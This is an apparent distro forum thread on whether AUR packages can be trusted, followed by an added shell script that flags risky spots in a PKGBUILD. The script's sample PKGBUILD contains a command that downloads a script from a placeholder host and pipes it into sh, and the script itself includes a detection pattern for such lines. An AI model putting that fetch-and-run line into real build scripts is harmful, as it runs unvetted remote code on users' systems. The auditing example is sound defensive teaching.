I don't know how to analyze code ..... Are AUR packages safe?

I have installed only one package from AUR namely google-earth-pro. I am paranoid about security but I don’t know how to analyze code and search for malware.

Can I trust AUR packages? By “trust” I mean the packages must not contain any malware.

So far my experience with the AUR is that sometimes the maintainers of some packages are late to update them. While this is not as dangerous as having malware, it is disappointing.

Short answer: mostly yes, but not blindly.

Long answer:

6 Likes

Debian’s official repos are so huge that they don’t need something like the AUR. At the same time, some long-time Linux users tell me that, despite the fact that Arch’s main repos are much smaller than Debian’s, Arch has an advantage. The advantage that Arch has is better-maintained repos. I was told that Debian has very, very old and unmaintained packages in its repos.

Bottom line: I haven’t yet found a distro which excels in all areas.

The AUR also contains some proprietary software that one may need, packaged for Arch, like RStudio or Zoom. The Debian repo is only free software. But there is the option to use Flatpaks or AppImages, which can also be used on Arch, but that doesn’t make proprietary software any safer…

2 Likes

That will be unlikely to ever exist.

The AUR is considered a big plus in Arch-based systems. But for beginners it is mostly advised not to use it blindly and to make sure to follow some rules, like inspecting the primary source from which the software was packaged, etc.

3 Likes

Asking this question on a distro’s forum that utilizes Arch repos and the AUR isn’t exactly an impartial place to ask this question. Most people here use it.

You shouldn’t take any of our replies for gospel. Only you can answer this question for yourself. It’s been well discussed here and in other parts of the very vast internet. Research.

Do you feel the AUR is safe?

1 Like

As I said, I can’t check the code. What I do before installing any package from the AUR is ask myself “is this a popular package?” My thinking is that if the package is installed by many users, at least some of them must have the necessary knowledge to review the code. I guess lots of Arch users must be using google-earth-pro.

Now, whether this is a sensible approach I am not sure.

I am not sure that the Arch repos are that much smaller to be honest. There are certainly packages in the Debian repos that aren’t in the Arch repos but there are also packages in the Arch repos that aren’t in the Debian repos.

Unfortunately, it is fairly difficult to compare repo sizes because the packaging is so different.

The vast majority of AUR packages don’t contain anything which requires special skills to check. The link above posted by @pebcak from @kresimir describes what you can check and how.

Some of the packages that are built from source are complicated and contain many patches and other things that can be hard to follow. However, these are exceptions. Most AUR packages are quite simple.

Checking most AUR packages doesn’t require a high degree of technical competency. It requires being willing to take the time to read them.

7 Likes
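The two points made above, inspect the primary source the package is built from and actually read the PKGBUILD, can be given a small mechanical starting point. The script below is an added example written for this thread, not code from any poster or from the AUR tooling. It reads a PKGBUILD and lists the spots a reviewer should look at first: sources downloaded over plain http, remote sources whose checksum is `SKIP` (so nothing pins what gets downloaded), and build or install steps that pipe a download straight into a shell. The PKGBUILD it runs against is a constructed sample with made-up hosts (`example.org`, `example.net`); `pkgbuild_array` and `audit_pkgbuild` are names chosen here. It is a reading aid, not a malware scanner: a clean report means only that the obvious red flags are absent, and the upstream `url=` and the source hosts still have to be compared by hand.

```shell
#!/bin/sh
# Added example (not from the thread): a reviewer's aid that points at the
# parts of a PKGBUILD a human should read before running makepkg.

# Constructed sample PKGBUILD; the hosts and checksums are made up.
SAMPLE_PKGBUILD='pkgname=example-tool
pkgver=1.2.3
pkgrel=1
url="https://example.org/example-tool"
source=("https://example.org/releases/example-tool-1.2.3.tar.gz"
        "http://mirror.example.net/extra-bin"
        "example-tool.desktop")
sha256sums=("0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
            "SKIP"
            "SKIP")
build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}
package() {
  cd "$srcdir/example-tool-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://example.net/post-install.sh | sh
}
'

# Print the elements of a bash-style array assignment such as source=(...)
# or sha256sums=(...), one per line, with the double quotes removed.
pkgbuild_array() {
    file=$1; name=$2
    awk -v name="$name" '
        $0 ~ ("^" name "=\\(") { inblk = 1 }
        inblk {
            line = $0
            sub("^" name "=\\(", "", line)
            if (line ~ /\)/) { sub(/\).*/, "", line); inblk = 0 }
            n = split(line, parts, /[ \t]+/)
            for (i = 1; i <= n; i++) {
                p = parts[i]; gsub(/"/, "", p)
                if (p != "") print p
            }
        }' "$file"
}

# Pair each source with its checksum by position and print one WARN line per
# finding. Returns 0 when nothing was flagged, 1 otherwise.
audit_pkgbuild() {
    file=$1
    findings=0
    sums=$(pkgbuild_array "$file" sha256sums)
    if [ -z "$sums" ]; then
        echo "WARN: no sha256sums array found"
        findings=$((findings + 1))
    fi
    i=0
    for src in $(pkgbuild_array "$file" source); do
        i=$((i + 1))
        sum=$(printf '%s\n' "$sums" | sed -n "${i}p")
        case $src in
            http://*)   # no transport integrity; checksum is the only guard
                echo "WARN: source $i fetched over plain http: $src"
                findings=$((findings + 1)) ;;
        esac
        case $src in
            git+*|hg+*|svn+*|bzr+*) continue ;;   # SKIP is normal for VCS sources
        esac
        case $src in
            *://*)      # remote archive with nothing pinning its contents
                if [ "$sum" = "SKIP" ] || [ -z "$sum" ]; then
                    echo "WARN: source $i has no checksum (SKIP): $src"
                    findings=$((findings + 1))
                fi ;;
        esac
    done
    # A download executed at build or install time bypasses the checksums
    # entirely, so every such line deserves a look.
    piped=$(grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$file")
    if [ -n "$piped" ]; then
        printf 'WARN: download piped into a shell at line: %s\n' "$piped"
        findings=$((findings + $(printf '%s\n' "$piped" | wc -l)))
    fi
    echo "findings: $findings"
    [ "$findings" -eq 0 ]
}

# Stand-alone demo: write the constructed sample to a temp file and audit it.
run_demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PKGBUILD" > "$tmp"
    audit_pkgbuild "$tmp"
    rm -f "$tmp"
}

run_demo
```

To use it on a real package, clone its AUR repository (`git clone https://aur.archlinux.org/<pkgname>.git`) and run `audit_pkgbuild <pkgname>/PKGBUILD`; then open the file and read the `source=` entries and the `build()`/`package()` bodies yourself, since the script only narrows down where to look.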